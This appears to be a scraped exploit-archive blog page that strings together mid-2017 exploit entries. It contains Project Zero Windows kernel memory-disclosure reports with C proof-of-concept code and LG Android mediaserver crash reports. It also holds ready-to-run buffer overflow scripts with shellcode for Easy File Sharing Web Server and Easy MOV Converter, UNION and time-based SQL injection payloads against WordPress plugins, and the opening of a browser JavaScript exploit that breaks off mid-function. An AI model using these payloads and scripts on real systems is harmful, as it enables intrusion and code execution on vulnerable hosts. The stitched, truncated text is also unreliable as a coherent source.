Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1153
We have discovered that the win32k!NtGdiEnumFonts system call handler discloses very large portions of uninitialized pool memory to user-mode clients.
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for win32k.sys. Then, it is clearly visible that a significant number of the bytes are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region. In this case, the marker byte is 0x47 ("G"), and a dump of the initial 512 bytes of output is shown below. A full dump of the output can be found in the attached file.
--- cut ---
00000000: e4 01 00 00 70 01 00 00 04 00 00 00 25 00 00 00 ....p.......%...
00000010: 12 00 00 00 00 00 00 00 00 00 00 00 90 01 00 00 ................
00000020: 00 00 00 ee 03 02 01 31 43 00 6f 00 6e 00 73 00 .......1C.o.n.s.
00000030: 6f 00 6c 00 61 00 73 00 00 00 47 47 47 47 47 47 o.l.a.s...GGGGGG
00000040: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000050: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000060: 47 47 47 47 47 47 00 00 43 00 6f 00 6e 00 73 00 GGGGGG..C.o.n.s.
00000070: 6f 00 6c 00 61 00 73 00 00 00 47 47 47 47 47 47 o.l.a.s...GGGGGG
00000080: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000090: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
000000a0: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
000000b0: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
000000c0: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
000000d0: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
000000e0: 47 47 47 47 47 47 00 00 52 00 65 00 67 00 75 00 GGGGGG..R.e.g.u.
000000f0: 6c 00 61 00 72 00 00 00 47 47 47 47 47 47 47 47 l.a.r...GGGGGGGG
00000100: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000110: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000120: 47 47 47 47 47 47 00 00 43 00 65 00 6e 00 74 00 GGGGGG..C.e.n.t.
00000130: 72 00 61 00 6c 00 20 00 45 00 75 00 72 00 6f 00 r.a.l. .E.u.r.o.
00000140: 70 00 65 00 61 00 6e 00 00 00 47 47 47 47 47 47 p.e.a.n...GGGGGG
00000150: 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG
00000160: 47 47 47 47 47 47 47 47 64 76 00 08 00 00 00 00 GGGGGGGGdv......
00000170: 47 47 47 47 00 ff 01 02 25 00 00 00 1d 00 00 00 GGGG....%.......
00000180: 08 00 00 00 05 00 00 00 00 00 00 00 11 00 00 00 ................
00000190: 23 00 00 00 90 01 00 00 00 00 00 00 60 00 00 00 #...........`...
000001a0: 60 00 00 00 00 00 ff fe 01 00 02 00 00 00 00 36 `..............6
000001b0: ee 47 47 47 40 00 24 00 00 08 00 00 5e 09 00 00 .GGG@.$.....^...
000001c0: 66 04 00 00 ff 02 00 e1 ff fc 00 40 09 00 00 00 f..........@....
000001d0: 00 00 00 00 9f 01 00 60 00 00 d7 df 61 6c 00 08 .......`....al..
000001e0: 00 00 00 00 e4 01 00 00 70 01 00 00 04 00 00 00 ........p.......
000001f0: 25 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 %...............
--- cut ---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42214.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863135788
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1154
We have discovered that the handler of the IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS IOCTL in volmgr.sys discloses portions of uninitialized pool memory to user-mode clients, due to output structure alignment holes.
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a VOLUME_DISK_EXTENTS structure [1], which in turn contains a list of DISK_EXTENT structures [2]. If we map the above shadow bytes to the structure definitions, it turns out that the uninitialized bytes correspond to alignment holes after the NumberOfDiskExtents and DiskNumber fields (both of type DWORD, but there is an 8-byte alignment due to other LARGE_INTEGER fields). The concrete number of leaked bytes depends on the number of entries returned by the IOCTL.
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region:
--- cut ---
00000000: 01 00 00 00[b3 b3 b3 b3]00 00 00 00[b3 b3 b3 b3]................
00000010: 00 00 50 06 00 00 00 00 00 00 90 39 06 00 00 00 ..P........9....
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Open the disk device.
HANDLE hDisk = CreateFile(L"\\\\.\\C:",
0,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDisk == INVALID_HANDLE_VALUE) {
printf("CreateFile failed, %d\n", GetLastError());
return 1;
}
// Obtain the output data, assuming that it will fit into 128 bytes.
BYTE extents[128];
DWORD BytesReturned;
if (!DeviceIoControl(hDisk, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, &extents, sizeof(extents), &BytesReturned, NULL)) {
printf("DeviceIoControl failed, %d\n", GetLastError());
CloseHandle(hDisk);
return 1;
}
// Dump the output data on screen and free resources.
PrintHex(extents, BytesReturned);
CloseHandle(hDisk);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1156&desc=2
We have discovered that the handler of the IOCTL_DISK_GET_DRIVE_GEOMETRY_EX IOCTL in partmgr.sys discloses portions of uninitialized pool memory to user-mode clients, due to output structure alignment holes.
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ff ff ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode.
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region:
--- cut ---
00000000: bf 0c 00 00 00 00 00 00 0c 00 00 00 ff 00 00 00 ................
00000010: 3f 00 00 00 00 02 00 00 00 00 00 40 06 00 00 00 ?..........@....
00000020: 18 00 00 00 00 00 00 00 ee a2 5d 9f 00 00 00 00 ..........].....
00000030: 00 00 00 00 00 00 00 00 38 00 00 00 01 00 00 00 ........8.......
00000040: 80 00[c1 c1]ff 03 00 00 3f 00 fe 00 01 00[c1 c1]........?.......
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Open the disk device.
HANDLE hDisk = CreateFile(L"\\\\.\\C:",
0,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDisk == INVALID_HANDLE_VALUE) {
printf("CreateFile failed, %d\n", GetLastError());
return 1;
}
// Obtain the output data, assuming that it will fit into 1024 bytes.
BYTE geometry[1024];
DWORD BytesReturned;
if (!DeviceIoControl(hDisk, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, NULL, 0, &geometry, sizeof(geometry), &BytesReturned, NULL)) {
printf("DeviceIoControl failed, %d\n", GetLastError());
CloseHandle(hDisk);
return 1;
}
// Dump the output data on screen and free resources.
PrintHex(geometry, BytesReturned);
CloseHandle(hDisk);
return 0;
}
#!/usr/bin/python
# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
# Author : Touhid M.Shaikh
# Date : 12 June, 2017
# Contact: touhidshaikh22@gmail.com
# Version: 7.2
# category: Remote Exploit
# Tested on: Windows XP SP3 EN [Version 5.1.2600]
"""
######## Description ########
What is Easy File Sharing Web Server 7.2 ?
Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs.They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.
######## Video PoC and Article ########
https://www.youtube.com/watch?v=Mdmd-7M8j-M
http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/
"""
import httplib
total = 4096
#Shellcode Open CMD.exe
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")
our_code = "\x90"*100 #NOP Sled
our_code += shellcode
our_code += "\x90"*(4072-100-len(shellcode))
# point Ret to Nop Sled
our_code += "\x3c\x62\x83\x01" # Overwrite RET
our_code += "\x90"*12 #Nop Sled
our_code += "A"*(total-(4072+16)) # ESP pointing
# Server address and POrt
httpServ = httplib.HTTPConnection("192.168.1.6", 80)
httpServ.connect()
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)
response = httpServ.getresponse()
httpServ.close()
"""
NOTE : After Exiting to cmd.exe our server will be crash bcz of esp
Adjust esp by yourself ... hehhehhe...
"""
"""
__ __| _ \ | | | |_ _| __ \
| | | | | | | | | |
| | | | | ___ | | | |
_| \___/ \___/ _| _|___|____/
Touhid M.Shaikh
"""
# # # # #
# Exploit Title: Real Estate Classifieds Script - SQL Injection
# Dork: N/A
# Date: 12.06.2017
# Vendor : http://www.easyrealestatescript.com/
# Software: http://www.easyrealestatescript.com/demo.html
# Demo: http://www.easyrealestatescript.com/demo.html
# Version: N/A
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection :
# http://localhost/[PATH]/site_search.php?s_purpose=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL]
# # # # #
# Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
# Date: 03-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
# Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
# Version: 3.4.1
# CVE : CVE-2017-9418
# Category: webapps
1. Description:
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
WordPress allows an authenticated user to execute arbitrary SQL commands via
the testid parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
comment
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1221
Similar to the previously reported issue 1206 , when parsing AVI files the
CAVIFileParser object contains a fixed-size array of (what appears to be)
pointer/length pairs, used (I suppose) to store the data for each stream.
This is a fixed size, with 40 entries. However, it is never verified that the
number of streams in the file is less than this number; and when freeing the
CAVIFileParser object, we will iterate through this array past the end of the
object, freeing each non-NULL pointer entry.
This presents initially as a free of an uninitialised pointer, since there is
a correctly aligned field inside the CAVIFileParser object that does not appear
to be used at all; careful heap grooming can turn this into a free of an
attacker controlled value. It can also however be used to traverse outside the
object by ensuring that this uninitialised value is a NULL pointer, and instead
free pointers from the object following the CAVIFileParser object, resulting in
a use-after-free.
The attached sample file (and generation script) triggers the latter case, and
will usually crash attempting to free an invalid pointer from outside the bounds
of the CAVIFileParser object.
The two quirks of the attached sample file necessary to reach this vulnerability
are that the number of streams in the avi are larger than 40 and that the file
is truncated before the strl LIST objects are completed, to avoid triggering a
NULL-pointer dereference attempting to retrieve the movi information for the
file.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 9473, tid: 9473, name: mediaserver >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf0040070
AM write failed: Broken pipe
r0 00000002 r1 0000000f r2 ffffffd0 r3 f6dd12f0
r4 f6dd12e8 r5 f0051c88 r6 f6202000 r7 f0040000
r8 f6209008 r9 f6dc4594 sl 00000001 fp ffc82f9c
ip f004003c sp ffc82d38 lr f6da67a7 pc f6da3826 cpsr 200f0030
backtrace:
#00 pc 00055826 /system/lib/libc.so (ifree+49)
#01 pc 000587a3 /system/lib/libc.so (je_free+374)
#02 pc 000059ad /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+164)
#03 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
#04 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
#05 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
#06 pc 00025a49 /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorC2ERKNS_2spINS_10DataSourceEEE+308)
#07 pc 00022a67 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+38)
#08 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#09 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
#10 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
#11 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
#12 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#13 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#14 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#15 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#16 pc 00001c15 /system/bin/mediaserver
#17 pc 000174a9 /system/lib/libc.so (__libc_init+44)
#18 pc 00001e68 /system/bin/mediaserver
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42169.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1206
Missing bounds-checking in AVI stream parsing
When parsing AVI files, CAVIFileParser uses the stream count from the AVI header
to allocate backing storage for storing metadata about the streams (member
variable m_aStream). However, the number of stream headers we parse is never
validated against this allocation size during parsing, so we can write further
metadata past the end of this buffer by constructing a file which contains more
stream headers than expected.
The allocation happens here:
int CAVIFileParser::ParseChunkAviHdr(int a2, unsigned int chunk_size)
{
struct AviHeader *avih;
int result;
// snip some sanity checking (have we already found an 'avih' chunk, is this
// chunk large enough to contain an avi header.)
result = AVISourceReader::AVI_fread(this->source, avih, sizeof(struct AviHeader), 1);
if ( result <= 0 )
{
// snip...
}
else
{
stream_count = avih->dwStreams; // <-- this is an attacker-controlled count
this->m_aStreamCount = stream_count;
this->m_aStream = malloc(stream_count * sizeof(struct AviStream));
this->m_aStreamIndex = -1;
// snip...
}
return 1;
}
There doesn't appear to be any integer overflow checking in the multiplication
either; so if the current issue is directly fixed there could still be a
vulnerability if stream_count * sizeof(struct AviStream) overflows.
this->m_aStreamIndex is incremented without checking in
CAVIFileParser::ParseChild and used as an index into m_aStream in several places
without checking, including in CAVIFileParser::ParseChunkStrHdr and
CAVIFileParser::ParseChunkStrFmt.
Several of the values that we can get written out of bounds are pointers to
controlled data, which is an interesting exploitation primitive. I've attached
a PoC file and script to generate it which results in overlapping a SRIFFNode*
with the contents of a 'strf' chunk, resulting in a free of an attacker
controlled pointer - in this case, 0x41414141. Since the structure sizes are
dependent on the version of the library, this may not work on different builds,
but it will hopefully cause a crash regardless.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 19481, tid: 19585, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4140007c
r0 00000002 r1 00000012 r2 ffffffd0 r3 f6b572f0
AM write failed: Broken pipe
r4 f6b572e8 r5 41414141 r6 f5fb6000 r7 41400000
r8 f155c748 r9 f6b4a594 sl 00000001 fp f000081c
ip 41400048 sp f00005f8 lr f6b2c7a7 pc f6b29826 cpsr 200f0030
backtrace:
#00 pc 00055826 /system/lib/libc.so (ifree+49)
#01 pc 000587a3 /system/lib/libc.so (je_free+374)
#02 pc 000058f3 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser15DeleteSRIFFNodeEP9SRIFFNode+54)
#03 pc 00005915 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParser7DestroyEv+12)
#04 pc 00005a33 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD1Ev+14)
#05 pc 00005a45 /system/lib/liblg_parser_avi.so (_ZN14CAVIFileParserD0Ev+4)
#06 pc 0000442f /system/lib/liblg_parser_avi.so (_ZN9AVIParser5CloseEv+12)
#07 pc 00025baf /system/lib/libLGParserOSAL.so (_ZN7android14LGAVIExtractorD1Ev+26)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42170.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1222
There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check
that the size of the copy is smaller than the size of the source buffer,
resulting in an out-of-bounds heap read.
The vulnerable code appears to be in handling the parsing of an extension object of
type ASF_Metadata_Object with a Description Record with an overly large length.
See attached for a crash poc. This issue probably allows leaking mediaserver
memory from an app process on the device via the retrieved metadata.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'
Revision: '11'
ABI: 'arm'
pid: 10423, tid: 10533, name: Binder_2 >>> /system/bin/mediaserver <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xf05c0000
r0 ef5aff40 r1 f05bfff5 r2 00f5007f r3 00000000
r4 f050b280 r5 f0510000 r6 00ffffff r7 00000000
r8 000000b5 r9 00000034 sl 00000000 fp f05455a0
ip f05e2e1c sp f06f35c8 lr f05d8c9d pc f71d77b4 cpsr 200b0010
backtrace:
#00 pc 000177b4 /system/lib/libc.so (__memcpy_base+88)
#01 pc 00003c99 /system/lib/liblg_parser_asf.so (_ZN9ASFParser27ParseHeaderExtensionObjectsEv+436)
#02 pc 00006a87 /system/lib/liblg_parser_asf.so (_ZN9ASFParser6OpenExEP11IDataSourcei+50)
#03 pc 00024a93 /system/lib/libLGParserOSAL.so (_ZN7android12ASFExtractorC1ERKNS_2spINS_10DataSourceEEERKNS1_INS_8AMessageEEE+270)
#04 pc 00022aa9 /system/lib/libLGParserOSAL.so (_ZN7android15LGExtractorOSAL17CreateLGExtractorERKNS_2spINS_10DataSourceEEEPKcRKNS1_INS_8AMessageEEE+104)
#05 pc 000c033b /system/lib/libstagefright.so (_ZN7android14MediaExtractor6CreateERKNS_2spINS_10DataSourceEEEPKc+242)
#06 pc 000d66db /system/lib/libstagefright.so (_ZN7android28StagefrightMetadataRetriever13setDataSourceERKNS_2spINS_10DataSourceEEE+34)
#07 pc 000591e3 /system/lib/libmediaplayerservice.so (_ZN7android23MetadataRetrieverClient13setDataSourceERKNS_2spINS_11IDataSourceEEE+82)
#08 pc 0008e329 /system/lib/libmedia.so (_ZN7android24BnMediaMetadataRetriever10onTransactEjRKNS_6ParcelEPS1_j+468)
#09 pc 00019931 /system/lib/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+60)
#10 pc 0001eccb /system/lib/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+550)
#11 pc 0001ee35 /system/lib/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+64)
#12 pc 0001ee99 /system/lib/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+48)
#13 pc 00023909 /system/lib/libbinder.so
#14 pc 000100d1 /system/lib/libutils.so (_ZN7android6Thread11_threadLoopEPv+112)
#15 pc 0003f9ab /system/lib/libc.so (_ZL15__pthread_startPv+30)
#16 pc 0001a0c5 /system/lib/libc.so (__start_thread+6)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42171.zip
# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps
1. Description:
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
3. Solution:
A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.
4. Reference:
http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps
1. Description:
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 13-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Easy MOV Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/easy_mov_converter.exe
# Tested On: Windows 7 SP1 32bit
#
# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################
# If you're using WinXP SP3, change this to 996
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
SEH = "\x5c\x14\x01\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
junk = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + junk + buf
f = open ("exploit.txt", "w")
f.write(data)
f.close()
<html>
// Source: https://github.com/secmob/pwnfest2016/
<script>
function exploit(){
function to_hex(num){
return (num>>>0).toString(16);
}
function intarray_to_double(int_arr){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
uBuf[0]=int_arr[0];
uBuf[1]=int_arr[1];
return dBuf[0];
}
function str_to_double(str){//leng of str must be 8
var dBuf = new Float64Array(1);
var u8Buf = new Uint8Array(dBuf.buffer);
for(var i=0;i<str.length;i++){
u8Buf[i] = str.charCodeAt(i);
}
return dBuf[0];
}
function double_to_array(value){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
dBuf[0]=value;
return uBuf;
}
function gc(){
for(var i=0;i<0x100000/16;i++){
new String;
}
}
function getHiddenValue(){
